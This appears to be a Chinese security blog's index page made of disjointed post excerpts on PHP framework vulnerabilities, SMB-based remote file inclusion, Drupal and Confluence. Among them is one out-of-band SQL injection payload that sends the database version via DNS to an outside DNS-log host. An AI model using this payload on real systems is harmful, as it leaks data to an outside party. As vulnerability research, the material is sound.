前言

看到freebuf上的《RFI绕过URL包含限制Getshell》和先知社区上的《通过SMB造成远程文件包含（双Off情况）》这两篇文章，说是利用SMB协议可以绕过php对远程文件包含的限制。

文章首先发布在先知社区,转载请注明出处。

框架介绍

Yii框架是一个通用的WEB编程框架， 其代码简洁优雅，具有性能高，易于扩展等优点，在国内国内均具有庞大的使用群体。

在Seebug上看到的《Drupal 1-click to RCE 分析》这篇关于Drupal的漏洞分析，感觉很精彩，用到了三个很有意思的技巧点。

下载方式

https://product-downloads.atlassian.com/software/confluence/downloads/atlassian-confluence-6.9.0.zip

Codeigniter介绍

Codeigniter是一款非常流行的PHP框架。我也曾经用这个框架开发了不少项目，因为结构简单，没有Laravel等框架那么复杂，在PHP开发圈使用量也比较大。

PHP的漏洞当中，各种利用方式所需要的条件是不一样的。有的需要指定版本，有的需要指定的php.ini条件，做此记录，防止时间久了模糊。

1).截断问题

Mehr lesen

1

SELECT LOAD_FILE(CONCAT('\\\\',version(),'.a.ceshia.ag5dgy.ceye.io\\abc'))

背景

Wazuh 的 OSSEC提供邮件报警功能，配置部分在

1

# vim /var/ossec/etc/ossec.conf

PHP部分

1).vsprintf和sprintf导致的单引号逃逸问题

两个函数都是用来格式化字符串的。

判断codeigniter框架和版本

1

grep -GR "define('CI_VERSION', '.*');"  ./